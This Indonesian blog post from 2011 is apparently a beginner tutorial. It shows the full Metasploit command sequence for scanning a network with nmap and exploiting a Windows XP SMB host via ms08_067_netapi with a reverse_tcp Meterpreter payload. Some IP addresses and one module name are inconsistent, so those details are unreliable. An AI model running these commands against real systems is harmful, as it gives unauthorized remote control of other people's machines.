Jumat, 28 Oktober 2011

Basic Exploitation : Metasploit

Exploitasi adalah sebuah pemanfaatan vulnerable system yang memungkinkan terjadinya remote system oleh user yang tidak terautentikasi. Dalam dunia exploitasi, software yang terkenal untuk exploitasi adalah metasploit.

Exploitasi memang terdengar sulit, namun pengaplikasiannya sangat mudah. Kita cukup mengenal siklus hacker bekerja, yaitu:  
- Information Gathering
- Vulnerability Assessment
- Gaining Access 
- Maintaining Access 
- Wiping Trace




Pertama kali, kita harus mencari informasi target. Dalam Backtrack, hal ini bisa dilakukan dengan menggunakan nmap. Untuk memahaminya, gunakan command:

nmap 172.16.128.1/24

Command ini berfungsi untuk melakukan scanning pada network dengan kisaran IP => 172.16.128.1 sampai 172.16.128.255.
Terlihat pada hasil scan nmap, ada dua host yang up yaitu:
  • 172.16.128.1 [ip saya]
  • 172.16.128.1 [ip target]
Kemudian langkah selanjutnya adalah melakukan scanning pada host yang up dengan nmap. Command dasarnya adalah:

nmap [ip-host]

Jika target host kamu adalah 172.16.129.128, maka gunakan:

nmap 172.16.129.128
Terlihat bahwa host 172.16.129.128 memiliki tiga port yang terbuka yaitu:
  • 135
  • 139
  • 445
Dan menggunakan sistem operasi Windows dengan port 445 yang terbuka. Langkah berikutnya adalah menentukan exploit yang bisa digunakan untuk memicu vulnerability. Untuk melihat exploit yang bisa digunakan, bukalah console metasploit dengan command:

msfconsole

Lalu ketik:

msf > show exploits
Untuk sistem operasi Windows XP dengan port 445 yang terbuka, kita bisa menggunakan modul exploit ms08_06_netapi
Gunakan perintah:

msf > use exploit/windows/smb/ms08_067_netapi
Setelah itu gunakan payload, sebagai penghubung exploit dengan remote system. Untuk melihat payload yang bisa digunakan, gunakan perintah:
msf > show payloads

msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
Perintah ini akan membuat exploit berinteraksi dengan meterpreter melalui TCP. Setelah itu, set local remote yang akan dijadikan base exploit. Gunakan commmand:
msf  exploit(ms08_067_netapi) > set LHOST 172.16.129.1 

Perlu diperhatikan, untuk local remote, gunakan IP kita sendiri.
Kemudian, tentukan remote host atau IP target exploitasi. Gunakan perintah:

msf  exploit(ms08_067_netapi) > set RHOST 172.16.129.128
Setelah itu, cek kembali dependency modul yang akan diekseskusi dengan menggunakan perintah:

msf  exploit(ms08_067_netapi) > show options
Setelah semua options terisi dengan benar, lakukan eksekusi eksploitasi dengan perintah:

msf  exploit(ms08_067_netapi) > exploit
Terlihat bahwa metasploit langsung berinteraksi dengan modul payload meterpreter.
Dengan peyload meterpreter yang telah aktif, berarti kita telah berhasil melakukan eksploitasi. Cukup kali ini basic exploitation yang saya sampaikan. Berikutnya akan ada basic meterpreter untuk memahami basic command meterpreter.



Sumber : in here

Diposting oleh Tempat Share tentang IT di 21.25
Label:

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)